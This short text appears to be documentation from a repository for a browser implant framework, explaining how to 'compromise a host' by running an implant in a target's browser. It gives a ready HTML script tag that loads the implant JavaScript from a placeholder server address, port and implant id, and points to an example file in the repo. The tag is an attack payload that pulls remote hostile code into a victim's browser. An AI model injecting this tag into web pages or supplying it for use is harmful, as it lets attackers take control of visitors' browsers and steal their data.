Last updated 2 years ago
To compromise a host, you must execute the implant on the target browser.
This can be done easily using the following HTML tag to include the implant script:
<script src="http://<server_address>:<port>/<implant_id>.js"></script>
See an example in the file within the repo.